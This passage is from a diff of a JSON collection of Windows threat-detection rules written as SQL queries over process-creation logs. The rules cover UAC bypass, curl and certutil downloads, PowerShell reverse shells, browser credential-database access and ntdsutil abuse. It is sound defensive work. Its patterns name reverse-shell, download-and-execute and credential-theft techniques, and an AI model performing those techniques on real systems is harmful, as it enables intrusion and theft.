(Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. 
It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects the execution of a renamed office binary", + "description": "Detects potential RDP connection via 
Mstsc using a local \".rdp\" file located in suspicious locations.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", + 
"title": "File Download Via Curl.EXE", + "id": "9a517fca-4ba3-4629-9278-a68694697b81", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects file download using curl.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins", + "Administrative activity", + "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_curl_download.yml" }, { - "title": "Suspicious Reg Add Open 
Command", - "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "title": "Remote Access Tool - AnyDesk Execution", + "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", "status": "test", - "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" ], - "filename": "proc_creation_win_reg_open_command.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk.yml" }, { - "title": "Use of FSharp Interpreters", - "id": "b96b2031-7c17-4473-afe7-a30ce714db29", + "title": "Group Membership Reconnaissance Via Whoami.EXE", + "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "status": "experimental", - "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Legitimate use by a software developer." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR NewProcessName LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" + "filename": "proc_creation_win_whoami_groups_discovery.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "a58353df-af43-4753-bad0-cd83ef35eef5", "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Legitimate usage to restore snapshots", + "Legitimate admin activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = 
'4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_ntdsutil_susp_usage.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" + "filename": "proc_creation_win_hktl_sharp_chisel.yml" }, { - "title": "Suspicious Git Clone", - "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", - "status": "experimental", - "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.t1593.003" + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_git_susp_clone.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", + "status": "experimental", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1614.001" ], "falsepositives": [ - "Administrative might use this function to check network connectivity" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", + "title": "Node Process Executions", + "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "author": "Max Altgelt (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.t1127", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE 
'%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" + "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" }, { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "title": "Application Whitelisting Bypass via Dnx.exe", + "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "status": "test", + "description": "Execute C# code located in the consoleapp folder", + "author": "Beyu Denis, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" + ], "falsepositives": [ - "Legitimate use of one of these tools" + "Legitimate use of dnx.exe by legitimate user" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', 
'66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', 
'2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE 
